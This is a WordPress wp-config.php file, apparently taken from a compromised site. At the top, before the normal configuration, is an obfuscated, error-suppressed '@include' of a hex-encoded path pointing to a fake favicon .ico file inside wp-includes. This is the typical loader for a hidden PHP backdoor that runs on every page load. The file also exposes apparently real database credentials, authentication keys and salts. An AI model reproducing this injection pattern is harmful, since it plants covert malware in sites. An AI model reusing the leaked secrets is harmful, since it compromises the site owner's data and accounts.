<?php
/*08bc0*/

@include "\x2fh\x6fm\x65/\x65s\x74e\x74i\x310\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fw\x70-\x69n\x63l\x75d\x65s\x2fR\x65q\x75e\x73t\x73/\x45x\x63e\x70t\x69o\x6e/\x66a\x76i\x63o\x6e_\x310\x338\x33f\x2ei\x63o";

/*08bc0*/
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'esteti10_wp826');

/** MySQL database username */
define('DB_USER', 'esteti10_wp826');

/** MySQL database password */
define('DB_PASSWORD', 'ap60xS(c0-');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'xhgavxhssniahrnivjoin9ybzcup08iouvudxcn2kuzt9uwtiml5v2uifszkne7m');
define('SECURE_AUTH_KEY',  'ramhvwrgm6b1eurpi7aehq4tzo6ujirndabkbjyfc22lpsh9m3cajvtfgryx2amg');
define('LOGGED_IN_KEY',    'vstn33gs6xrmm4fzasirgnvierv8bg4ijbxup8nkwbx9s4opiqq2piaawyourfzd');
define('NONCE_KEY',        '6vh54xb6fgitjy61dqoq1pppprga35cwifwflavekpgyohq6n7fvttzrevikng6g');
define('AUTH_SALT',        'rwvasackvlbf9kjeqvlbr6k6gie3qzapoxkj9gsvna89jdwttvxinlva9ujvteqc');
define('SECURE_AUTH_SALT', 'luxhvvx5m8wyzoq3fdoqab1jbogeqqtcsbgnp7ibd4wze4teznckaw9iu2buc6ip');
define('LOGGED_IN_SALT',   'fz08lwiph2lbuucuxcsbjusvyizreikayoxpyjcltdpl7mfjt3ll8e6n7acsik7f');
define('NONCE_SALT',       'swfrtix6ptl7evtfr1yzl5sbgk7kecf9pffaldfpq5issz8iwlxubk0zxjnrm3ug');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp30_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
